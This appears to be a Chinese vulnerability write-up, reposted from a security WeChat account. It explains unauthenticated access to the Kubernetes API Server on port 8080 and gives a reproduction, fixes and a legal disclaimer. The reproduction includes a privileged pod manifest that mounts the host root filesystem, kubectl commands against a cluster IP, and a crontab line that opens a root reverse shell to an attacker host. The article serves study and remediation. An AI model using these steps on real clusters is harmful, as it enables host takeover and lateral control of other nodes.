K8S API Server 未授权访问

一、漏洞原理

旧版本的k8s的API Server默认会开启两个端口：8080和6443。6443是安全端口，安全端口使用TLS加密；但是8080端口无需认证，仅用于测试。6443端口需要认证，且有 TLS 保护。（k8s<1.16.0）相当于开这个端口直接失陷

二、影响范围

1.16.0以前版本都有影响

三、漏洞复现

新版本的k8s(>1.16.0)都默认关闭8080端口，就要更改API Server的配置文件

添加两句话

vi cd /etc/kubernetes/manifests/
........
–insecure-port=8080
–insecure-bind-address=0.0.0.0
........

然后重启kubelet

systemctl restart kubelet.service

然后用直接访问8080端口会返回可用api

然后用kubectl来进行测试

返回集群和pod列表说明可行

然后编写一个特权容器

vi test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

然后使用 kubectl 创建容器,这个时候我们发现是无法指定在哪个节点上创建pod。

kubectl -s 10.99.35.190:8080 get pods -o wide

kubectl -s 10.99.35.190:8080 get pods -o wide

发现运行在node2里面

kubectl -s 10.99.35.190:8080 --namespace=default exec -it test bash

写入反弹 shell 的定时任务

echo -e "* * * * * root bash -i >& /dev/tcp/10.99.35.29/4444 0>&1n" >> /mnt/etc/crontab

成功反弹成功并且是root权限可以利用个漏洞控制其他node节点

或者也可以通过写公私钥的方式控制宿主机。

如果apiserver配置了dashboard的话，可以直接通过ui界面创建pod。

四、修复方法

1、升级k8s到1.16.0以上

2、设置防火墙，禁止8080端口访问

3、新版本不要开启k8s 8080端口

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：K8S API Server 未授权访问